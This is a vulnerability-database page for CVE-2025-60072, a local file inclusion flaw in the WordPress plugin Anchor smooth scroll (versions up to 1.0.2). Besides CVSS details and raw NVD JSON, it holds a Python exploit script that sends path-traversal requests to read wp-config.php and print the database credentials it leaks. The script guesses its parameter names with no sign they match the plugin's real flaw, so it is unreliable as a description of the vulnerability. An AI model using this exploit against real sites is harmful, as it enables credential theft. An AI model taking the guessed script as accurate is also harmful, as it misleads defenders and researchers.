Security Vulnerability Report
中文
CVE-2025-60072 CVSS 8.1 HIGH

CVE-2025-60072

Published: 2025-12-18 08:16:08
Last Modified: 2026-04-27 18:16:24
Source: [email protected]

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Processby Anchor smooth scroll anchor-smooth-scroll allows PHP Local File Inclusion.This issue affects Anchor smooth scroll: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Anchor smooth scroll <= 1.0.2 (所有版本)
WordPress (受影响插件运行环境)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60072 PoC - Local File Inclusion in Anchor Smooth Scroll Plugin # Target: WordPress site with Anchor smooth scroll plugin <= 1.0.2 import requests import sys from urllib.parse import quote def exploit_lfi(target_url, filename='../../../../wp-config.php'): """ Exploit Local File Inclusion vulnerability Args: target_url: Base URL of the vulnerable WordPress site filename: Path to file to read (path traversal) """ # Encode the path traversal payload encoded_filename = quote(filename) # Try common parameter names used by anchor smooth scroll params_to_try = [ f'?anchor={encoded_filename}', f'?page_id={encoded_filename}', f'?scroll={encoded_filename}', ] for param in params_to_try: try: url = target_url.rstrip('/') + param response = requests.get(url, timeout=10) # Check if file content was returned if 'DB_NAME' in response.text or '<?php' in response.text: print(f'[+] Success! File content found at: {url}') print(f'[+] Content preview:\n{response.text[:500]}...') return True elif response.status_code == 200 and len(response.text) > 0: print(f'[*] Possible leak at: {url}') except requests.RequestException as e: print(f'[-] Error: {e}') return False # Example usage if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve_2025_60072_poc.py <target_url>') print('Example: python cve_2025_60072_poc.py http://vulnerable-site.com') sys.exit(1) target = sys.argv[1] exploit_lfi(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60072", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:07.540", "lastModified": "2026-04-27T18:16:23.733", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Processby Anchor smooth scroll anchor-smooth-scroll allows PHP Local File Inclusion.This issue affects Anchor smooth scroll: from n/a through <= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/anchor-smooth-scroll/vulnerability/wordpress-anchor-smooth-scroll-plugin-1-0-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.